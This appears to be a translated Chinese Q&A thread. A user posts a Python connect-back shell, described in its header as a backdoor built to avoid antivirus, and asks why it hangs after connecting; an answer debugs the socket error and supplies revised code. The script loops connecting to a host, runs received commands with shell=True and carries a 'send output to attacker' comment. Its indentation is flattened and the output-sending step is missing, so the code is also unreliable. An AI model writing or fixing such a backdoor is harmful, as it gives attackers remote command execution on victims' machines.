(假设所有的缩进和空格都是正确的)
#! /usr/bin/env python
# Copyright (c) 2011 Xavier Garcia www.shellguardians.com
# All rights reserved.
# Based on the Python connect back shell written by David Kennedy
# http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import socket
import subprocess
import sys
import time
HOST = '127.0.0.1'
PORT = 8080
print "Starting Listener and Reverse Shell proccess."
def connect((host, port)):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Okay #1"
s.connect((host, port))
print "Accessing..."
return s
def wait_for_command(s):
data = s.recv(1024)
print "Phase three, completed"
if data == "quit\n":
s.close()
sys.exit(0)
print "Socket Closed. Unable to boot."
# the socket died
elif len(data)==0:
return True
else:
# do shell command
proc = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
print "I think this worked..."
return False
def main():
while True:
socked_died=False
try:
s=connect((HOST,PORT))
while not socked_died:
socked_died=wait_for_command(s)
s.close()
except socket.error:
pass
time.sleep(5)
if __name__ == "__main__":
sys.exit(main())
此代码一直循环,直到它显示“Okay#1”。它似乎没有转移到其他代码行。我自己首先尝试制作这种脚本,但一直都失败了所以我去了互联网寻求帮助。这段代码需要一段时间才能执行,因此我放置了打印脚本,以便我可以看到它是否正常工作。
答案 0 :(得分:0)
调用s.connect((host,port))时,您的connect方法会抛出异常。它会打印出“Okay#1”,然后下一行会爆炸。因此,它会跳转到您的except socket.error块并调用pass。然后它睡了5ms然后重新尝试,结果完全相同。
你能找出socket.error是什么并记录下来吗?
也许你可以试试这个(这是基于这个link):
while True:
socked_died=False
try:
s=connect((HOST,PORT))
while not socked_died:
socked_died=wait_for_command(s)
s.close()
except socket.error, (value,message):
if s:
s.close()
print "Could not open socket: " + message
sys.exit(1)
time.sleep(5)